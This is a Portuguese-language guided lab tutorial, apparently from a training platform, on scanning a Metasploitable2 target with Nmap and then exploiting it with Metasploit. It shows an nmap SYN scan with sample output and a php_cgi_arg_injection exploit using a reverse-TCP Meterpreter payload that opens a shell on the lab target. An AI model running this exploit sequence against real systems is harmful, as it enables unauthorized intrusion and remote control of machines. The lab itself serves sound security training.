Realize a Análise de Vulnerabilidades e Teste de Penetração com Nmap no Kali Linux

NmapBeginner
Pratique Agora

Introdução

Neste laboratório, você aprenderá como realizar a varredura de vulnerabilidades (vulnerability scanning) e testes de penetração (penetration testing) em uma máquina alvo usando várias ferramentas no Kali Linux. O objetivo é obter experiência prática com ferramentas populares de varredura de vulnerabilidades e entender como aproveitar os resultados para conduzir ataques de penetração bem-sucedidos. O laboratório será conduzido na plataforma LabEx, onde você receberá um container Kali Linux como máquina de ataque e uma máquina virtual Metasploitable2 como alvo.

Este é um Lab Guiado, que fornece instruções passo a passo para ajudá-lo a aprender e praticar. Siga as instruções cuidadosamente para completar cada etapa e ganhar experiência prática. Dados históricos mostram que este é um laboratório de nível iniciante com uma taxa de conclusão de 100%. Recebeu uma taxa de avaliações positivas de 100% dos estudantes.

Configurando o Ambiente

Nesta etapa, você iniciará o container Kali Linux e a máquina alvo Metasploitable2 na plataforma LabEx.

  1. Abra um terminal xfce na máquina host LabEx e inicie o alvo Metasploitable2 executando o seguinte comando:
sudo virsh start Metasploitable2

Aguarde o início da máquina alvo, pode levar de 1 a 3 minutos.

  1. Teste a conectividade com a máquina alvo fazendo ping nela:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

  1. Inicie o container Kali Linux e entre no ambiente bash executando:
docker run -ti --network host b5b709a49cd5 bash
  1. Dentro do container Kali, teste a conexão de rede com a máquina alvo:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

Realizando a Varredura de Vulnerabilidades com Nmap

Nesta etapa, você aprenderá sobre algumas ferramentas populares de varredura de vulnerabilidades disponíveis no Kali Linux.

  1. X-scan: X-scan é uma ferramenta de varredura abrangente bem conhecida na China. É totalmente gratuita, não requer instalação e suporta interfaces gráficas e de linha de comando em chinês e inglês. X-scan é desenvolvido por um renomado grupo de hackers chinês chamado "Security Focus" e tem sido constantemente aprimorado desde sua versão de teste interna 0.2 em 2000.

  2. Nessus: Nessus é um dos softwares de varredura e análise de vulnerabilidades mais amplamente utilizados no mundo. Mais de 75.000 organizações usam o Nessus para escanear seus sistemas de computador. Nessus foi criado por Renaud Deraison em 1998 com o objetivo de fornecer um programa de varredura de segurança de sistema remoto gratuito, poderoso, frequentemente atualizado e fácil de usar para a comunidade da internet.

  3. SQLmap: SQLmap é uma ferramenta automática de injeção SQL que pode escanear, detectar e explorar vulnerabilidades de injeção SQL em uma determinada URL. Atualmente, ele suporta bancos de dados MS-SQL, MySQL, Oracle e PostgreSQL. SQLmap emprega quatro técnicas exclusivas de injeção SQL: inferência cega, consultas UNION, consultas empilhadas e injeção cega baseada em tempo.

  4. Nmap: Nmap é uma ferramenta poderosa e versátil de exploração de rede e auditoria de segurança. Ele pode ser usado para vários propósitos, incluindo descoberta de rede, varredura de portas e detecção de vulnerabilidades.

Agora, você usará o Nmap para realizar uma varredura de vulnerabilidades na máquina alvo Metasploitable2.

  1. Inicie o serviço de banco de dados Metasploit e inicialize o banco de dados:
cd ~
service postgresql start
msfdb init
  1. Inicie o console Metasploit:
msfconsole
  1. Dentro do console Metasploit, use o comando nmap para escanear a máquina alvo:
nmap -sS -T4 192.168.122.102

Aqui está um exemplo da saída que você pode ver:

[*] exec: nmap -sS -T4 192.168.122.102

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-23 23:15 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0032s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

O parâmetro -sS executa uma varredura TCP SYN (também conhecida como varredura half-open ou stealth), e -T4 define a política de tempo para ser agressiva, mas não muito rápida para evitar tráfego de rede excessivo.

  1. Observe a saída da varredura, que deve exibir as portas e serviços abertos na máquina alvo.

Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção

Explorando uma Vulnerabilidade

Nesta etapa, você usará as informações coletadas da varredura Nmap para explorar uma vulnerabilidade na máquina alvo Metasploitable2.

  1. Antes de tudo, se você não estiver no console Metasploit, deverá iniciar o console Metasploit:
cd ~
msfconsole
  1. A partir dos resultados da varredura Nmap, identifique uma porta aberta na máquina alvo, por exemplo, a porta 80. No console Metasploit, procure um módulo de exploit relacionado à porta aberta:
search http
  1. Use o módulo de exploit apropriado:
use exploit/multi/http/php_cgi_arg_injection
  1. Defina o endereço IP da máquina alvo:
set RHOST 192.168.122.102
  1. Defina o payload a ser usado:
set PAYLOAD php/meterpreter/reverse_tcp
  1. Defina o endereço IP da máquina local:
set LHOST 192.168.122.1
  1. Execute o exploit:
exploit

Aqui está um exemplo da saída que você pode ver:

[*] Started reverse TCP handler on 192.168.122.1:4444
[*] Sending stage (39927 bytes) to 192.168.122.102
[*] Meterpreter session 1 opened (192.168.122.1:4444 -> 192.168.122.102:38510) at 2024-03-23 23:21:14 +0000
  1. Se o exploit for bem-sucedido, você deverá obter acesso ao shell da máquina alvo. Verifique o acesso executando comandos como sysinfo para exibir informações do sistema.

  2. Se tiver tempo, você pode tentar explorar outras ferramentas de varredura de vulnerabilidades, como Nessus, SQLmap ou X-scan. Você também pode tentar explorar diferentes vulnerabilidades na máquina alvo Metasploitable2.

Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção

Resumo

Neste laboratório, você aprendeu como configurar um ambiente Kali Linux para testes de penetração e usar ferramentas populares de varredura de vulnerabilidades, como Nmap, para identificar potenciais vulnerabilidades em um sistema alvo. Você também adquiriu experiência prática na exploração de uma vulnerabilidade usando o Metasploit Framework. Este conhecimento prático o ajudará a entender a importância da varredura de vulnerabilidades e dos testes de penetração no campo da segurança cibernética.